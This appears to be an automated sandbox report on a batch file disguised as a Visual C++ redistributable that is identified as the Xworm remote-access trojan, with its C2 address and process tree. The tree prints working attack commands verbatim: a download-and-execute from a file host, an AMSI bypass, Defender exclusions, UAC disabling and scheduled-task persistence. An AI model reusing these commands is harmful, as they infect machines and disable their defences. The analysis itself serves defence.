Analysis

  • max time kernel
    150s
  • max time network
    144s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250217-en
  • resource tags

    arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    01/03/2025, 23:41

General

  • Target

    VC_redist.x64.bat

  • Size

    27KB

  • MD5

    59ed597b16bdecda0fa1f5317d679506

  • SHA1

    e2117126d6e4b2dd02d4eee180c8f786c9b6424e

  • SHA256

    8b095c70bb18e878b288db10c7b9d5de9ed2df22f075b30ed0cbf3fdcb2c9342

  • SHA512

    d37b2f951d1093bb1f750d6996e080f0f5b20ac2cf5139f32f1b154bf2d4a61a8ecb033383e6a3d7fbb875dae63d147d7dc97bc241bf2da1497e378822004dea

  • SSDEEP

    384:eQxxUGTxvOwLNVpRP5mx39dm7dQgh+1Oi:xxigvOwLDpd5mx39L

Malware Config

Extracted

Family

xworm

Version

3.1

C2

185.172.175.125:5000

Mutex

Uto2xJheY5reQlME

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 6 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies data under HKEY_USERS 55 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:636
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:468
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{7083be5e-c96e-4ba1-97cd-76a895bc8e3d}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3752
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:704
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:992
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:988
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1028
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1048
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                  1⤵
                    PID:1080
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                    1⤵
                      PID:1212
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1224
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:tSDwiFPbnYOm{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$TZINoAwDjAMPxW,[Parameter(Position=1)][Type]$VqcqMFpFUY)$SaHrtGEsCiN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+'l'+''+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+'l'+'e'+[Char](103)+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+'m'+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('MyD'+'e'+''+'l'+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'T'+'y'+''+'p'+''+[Char](101)+'','Cl'+[Char](97)+''+'s'+'s,'+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+'a'+''+[Char](108)+''+'e'+'d,'+[Char](65)+''+'n'+''+'s'+'i'+[Char](67)+''+'l'+''+'a'+''+'s'+'s'+','+''+'A'+'utoCl'+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$SaHrtGEsCiN.DefineConstructor(''+[Char](82)+''+'T'+'S'+'p'+''+[Char](101)+'c'+'i'+''+[Char](97)+'l'+[Char](78)+''+'a'+'m'+[Char](101)+''+[Char](44)+''+[Char](72)+'id'+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+'g'+[Char](44)+''+'P'+''+[Char](117)+'b'+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$TZINoAwDjAMPxW).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+'age'+'d'+'');$SaHrtGEsCiN.DefineMethod('I'+[Char](110)+''+'v'+''+[Char](111)+'ke','P'+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+''+','+''+[Char](72)+'id'+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+','+'N'+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+''+'o'+''+[Char](116)+''+[Char](44)+''+'V'+''+[Char](105)+''+'r'+''+'t'+''+'u'+''+'a'+''+[Char](108)+'',$VqcqMFpFUY,$TZINoAwDjAMPxW).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+','+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $SaHrtGEsCiN.CreateType();}$AFtDLfJAJmqJX=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+'Un'+[Char](115)+'a'+'f'+''+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+'th'+[Char](111)+''+[Char](100)+'s');$bEGCDetoawSDoa=$AFtDLfJAJmqJX.GetMethod(''+[Char](71)+''+'e'+'t'+'P'+''+[Char](114)+'o'+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+'r'+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags]('P'+'u'+''+[Char](98)+''+[Char](108)+''+'i'+'c,Stat'+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$SVziBsaPCzHmfzsgJNz=tSDwiFPbnYOm @([String])([IntPtr]);$sRirClWqtVlLbBIliIgmIk=tSDwiFPbnYOm @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$JmTYXdzFgWq=$AFtDLfJAJmqJX.GetMethod(''+[Char](71)+'e'+'t'+''+[Char](77)+'o'+'d'+'u'+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+'n'+''+'d'+''+[Char](108)+'e').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+''+[Char](110)+''+[Char](101)+''+'l'+''+[Char](51)+'2.d'+'l'+''+'l'+'')));$tdKrFhLkQzPSei=$bEGCDetoawSDoa.Invoke($Null,@([Object]$JmTYXdzFgWq,[Object](''+[Char](76)+'oa'+[Char](100)+''+'L'+''+[Char](105)+''+'b'+''+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+''+'A'+'')));$wMkSjqRxEkrqHZsSN=$bEGCDetoawSDoa.Invoke($Null,@([Object]$JmTYXdzFgWq,[Object](''+'V'+'i'+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+'lP'+'r'+'o'+'t'+'e'+'c'+''+'t'+'')));$gWfzXsW=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tdKrFhLkQzPSei,$SVziBsaPCzHmfzsgJNz).Invoke('ams'+'i'+''+'.'+''+'d'+''+[Char](108)+'l');$oDysBlNEjQerDdIpr=$bEGCDetoawSDoa.Invoke($Null,@([Object]$gWfzXsW,[Object](''+[Char](65)+'m'+[Char](115)+''+[Char](105)+''+[Char](83)+'c'+'a'+''+[Char](110)+'B'+[Char](117)+''+[Char](102)+'fe'+[Char](114)+'')));$dWZFbpyLZC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wMkSjqRxEkrqHZsSN,$sRirClWqtVlLbBIliIgmIk).Invoke($oDysBlNEjQerDdIpr,[uint32]8,4,[ref]$dWZFbpyLZC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$oDysBlNEjQerDdIpr,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wMkSjqRxEkrqHZsSN,$sRirClWqtVlLbBIliIgmIk).Invoke($oDysBlNEjQerDdIpr,[uint32]8,0x20,[ref]$dWZFbpyLZC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'OFTW'+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](115)+'v'+[Char](115)+'t'+'a'+''+'g'+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:4688
                      • C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
                        C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3136
                      • C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
                        C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
                        2⤵
                        • Executes dropped EXE
                        PID:1716
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                      1⤵
                        PID:1272
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1320
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1404
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                            1⤵
                              PID:1468
                              • C:\Windows\system32\sihost.exe
                                sihost.exe
                                2⤵
                                  PID:1844
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                1⤵
                                • Indicator Removal: Clear Windows Event Logs
                                PID:1560
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                1⤵
                                  PID:1640
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                  1⤵
                                    PID:1652
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k NetworkService -p
                                    1⤵
                                      PID:1688
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1736
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                        1⤵
                                          PID:1764
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                          1⤵
                                            PID:1824
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                            1⤵
                                              PID:1872
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1884
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1900
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                  1⤵
                                                    PID:2020
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                    1⤵
                                                      PID:1308
                                                    • C:\Windows\System32\spoolsv.exe
                                                      C:\Windows\System32\spoolsv.exe
                                                      1⤵
                                                        PID:2152
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                        1⤵
                                                          PID:2276
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                          1⤵
                                                            PID:2408
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                            1⤵
                                                              PID:2416
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k NetworkService -p
                                                              1⤵
                                                                PID:2468
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                1⤵
                                                                  PID:2544
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                  1⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2588
                                                                • C:\Windows\sysmon.exe
                                                                  C:\Windows\sysmon.exe
                                                                  1⤵
                                                                    PID:2600
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                    1⤵
                                                                      PID:2644
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                      1⤵
                                                                        PID:2660
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                        1⤵
                                                                          PID:2688
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                          1⤵
                                                                            PID:2080
                                                                          • C:\Windows\system32\wbem\unsecapp.exe
                                                                            C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                            1⤵
                                                                              PID:700
                                                                            • C:\Windows\Explorer.EXE
                                                                              C:\Windows\Explorer.EXE
                                                                              1⤵
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              • Suspicious use of UnmapMainImage
                                                                              PID:3308
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\VC_redist.x64.bat"
                                                                                2⤵
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:1096
                                                                                • C:\Windows\System32\Conhost.exe
                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  3⤵
                                                                                    PID:2904
                                                                                  • C:\Windows\system32\chcp.com
                                                                                    chcp.com 437
                                                                                    3⤵
                                                                                      PID:3032
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c type tmp
                                                                                      3⤵
                                                                                        PID:1608
                                                                                      • C:\Windows\system32\find.exe
                                                                                        fInd
                                                                                        3⤵
                                                                                          PID:1700
                                                                                        • C:\Windows\system32\find.exe
                                                                                          find
                                                                                          3⤵
                                                                                            PID:580
                                                                                          • C:\Windows\system32\findstr.exe
                                                                                            fiNdstr /L /I set C:\Users\Admin\AppData\Local\Temp\VC_redist.x64.bat
                                                                                            3⤵
                                                                                              PID:836
                                                                                            • C:\Windows\system32\findstr.exe
                                                                                              fiNdstr /L /I goto C:\Users\Admin\AppData\Local\Temp\VC_redist.x64.bat
                                                                                              3⤵
                                                                                                PID:4372
                                                                                              • C:\Windows\system32\findstr.exe
                                                                                                fiNdstr /L /I echo C:\Users\Admin\AppData\Local\Temp\VC_redist.x64.bat
                                                                                                3⤵
                                                                                                  PID:3408
                                                                                                • C:\Windows\system32\findstr.exe
                                                                                                  fiNdstr /L /I pause C:\Users\Admin\AppData\Local\Temp\VC_redist.x64.bat
                                                                                                  3⤵
                                                                                                    PID:3512
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c type tmp
                                                                                                    3⤵
                                                                                                      PID:3396
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      PowerShell -WindowStyle Hidden -Command "$codes = 104,116,116,112,115,58,47,47,102,105,108,101,115,46,99,97,116,98,111,120,46,109,111,101,47,99,122,49,50,57,114,46,48,48,69,113,113;irm $([Text.Encoding]::ASCII.GetString(@($codes))) | iex"
                                                                                                      3⤵
                                                                                                      • Blocklisted process makes network request
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Downloads MZ/PE file
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:3588
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXEcUTIONPoLICY ByPASS AdD-mPPrefEReNce -exCLUSioNPatH $eNv:PROGraMdatA, $enV:TeMp, $ENV:hoMeDRIvE; SEt-iTEmPRopErTy -PaTh "HKLM:\SOFTwArE\MicroSoFt\wINDOWs\curRenTVERsiON\PoLiCieS\sySTEm" -nAME "ConSENtprOmPTbEHAViorAdMIN" -VAluE 0 -tYPe DwoRD
                                                                                                        4⤵
                                                                                                        • UAC bypass
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:3688
                                                                                                      • C:\ProgramData\FMyUS.eXe
                                                                                                        "C:\ProgramData\FMyUS.eXe"
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:3284
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\sZbXOBIH.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\sZbXOBIH.exe"
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:3684
                                                                                                      • C:\ProgramData\svOrbEl0.exe
                                                                                                        "C:\ProgramData\svOrbEl0.exe"
                                                                                                        4⤵
                                                                                                        • Drops startup file
                                                                                                        • Executes dropped EXE
                                                                                                        • Adds Run key to start application
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4472
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svOrbEl0.exe'
                                                                                                          5⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:4236
                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            6⤵
                                                                                                              PID:4820
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svOrbEl0.exe'
                                                                                                            5⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:2632
                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              6⤵
                                                                                                                PID:3028
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svOrbEl0.exe'
                                                                                                              5⤵
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:4288
                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                6⤵
                                                                                                                  PID:3116
                                                                                                              • C:\Windows\System32\schtasks.exe
                                                                                                                "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svOrbEl0" /tr "C:\Users\Admin\AppData\Roaming\svOrbEl0.exe"
                                                                                                                5⤵
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:3240
                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  6⤵
                                                                                                                    PID:4992
                                                                                                              • C:\ProgramData\1ZRs6.EXe
                                                                                                                "C:\ProgramData\1ZRs6.EXe"
                                                                                                                4⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:1788
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c mountvol | find ":\"
                                                                                                              3⤵
                                                                                                                PID:4300
                                                                                                                • C:\Windows\system32\mountvol.exe
                                                                                                                  mountvol
                                                                                                                  4⤵
                                                                                                                    PID:3080
                                                                                                                  • C:\Windows\system32\find.exe
                                                                                                                    find ":\"
                                                                                                                    4⤵
                                                                                                                      PID:764
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -c add-mppreference -exclusionpath C:\
                                                                                                                    3⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:3848
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -c add-mppreference -exclusionpath F:\
                                                                                                                    3⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:1576
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -c add-mppreference -exclusionpath D:\
                                                                                                                    3⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:3988
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -Command "$url = @();$url += 'h';$url += 't';$url += 't';$url += 'p';$url += 's';$url += ':';$url += '/';$url += '/';$url += 'f';$url += 'i';$url += 'l';$url += 'e';$url += 's';$url += '.';$url += 'c';$url += 'a';$url += 't';$url += 'b';$url += 'o';$url += 'x';$url += '.';$url += 'm';$url += 'o';$url += 'e';$url += '/';$url += 'l';$url += 'l';$url += 'l';$url += 'l';$url += 't';$url += 'm';$url += '.';$url += 'f';$url += 'M';$url += '2';$url += 'G';$url += 'z';$url = $url -join '';$output = \"$env:PUBLIC\winglog32.exe\";$output2 = \"$env:PUBLIC\winglog64.exe\"; Invok耻耻豆德:~13,1色饿克饿:~26,1%豆德阿维:~54,1%耻饿维饿:~49,1%阿维色尔:~10,1%阿维色尔:~22,1%阿维色尔:~14,1%豆德阿维:~51,1%耻饿维饿:~8,1%耻耻豆德:~39,1%豆德阿维:~60,1%色饿克饿:~57,1豆德阿维:~58,1%耻饿维饿:~32,1%耻耻豆德:~51,1%色饿克饿:~57,1耻饿维饿:~4,1%豆德阿维:~19,1%耻饿维饿:~31,1%色饿克饿:~57,1色饿克饿:~48,1%耻饿维饿:~4,1%阿维色尔:~54,1%耻饿维饿:~22,1%耻饿维饿:~54,1%豆德阿维:~18,1%豆德阿维:~54,1%色饿克饿:~57,1豆德阿维:~57,1%豆德阿维:~51,1%阿维色尔:~54,1%耻耻豆德:~43,1%耻耻豆德:~12,1%耻饿维饿:~18,1耻饿维饿:~30,1%阿维色尔:~52,1%阿维色尔:~54,1%阿维色尔:~39,1%阿维色尔:~42,1%阿维色尔:~54,1耻耻豆德:~9,1%豆德阿维:~19,1%耻耻豆德:~23,1%色饿克饿:~0,1%色饿克饿:~30,1%耻耻豆德:~39,1%豆德阿维:~48,1%色饿克饿:~57,1耻耻豆德:~33,1%耻耻豆德:~51,1%豆德阿维:~18,1%色饿克饿:~30,1%阿维色尔:~37,1%色饿克饿:~45,1%色饿克饿:~10,1%豆德阿维:~7,1%阿维色尔:~56,1色饿克饿:~52,1%耻耻豆德:~12,1%色饿克饿:~10,1%耻饿维饿:~28,1%豆德阿维:~51,1%阿维色尔:~54,1%耻饿维饿:~30,1耻耻豆德:~21,1%色饿克饿:~45,1%豆德阿维:~38,1%色饿克饿:~10,1"
                                                                                                                    3⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:2308
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                1⤵
                                                                                                                  PID:3436
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                  1⤵
                                                                                                                    PID:3456
                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                    1⤵
                                                                                                                      PID:3852
                                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                      1⤵
                                                                                                                      • Suspicious use of UnmapMainImage
                                                                                                                      PID:3928
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                                                      1⤵
                                                                                                                        PID:4004
                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                        1⤵
                                                                                                                          PID:4012
                                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                                          1⤵
                                                                                                                            PID:4252
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                                                            1⤵
                                                                                                                              PID:4396
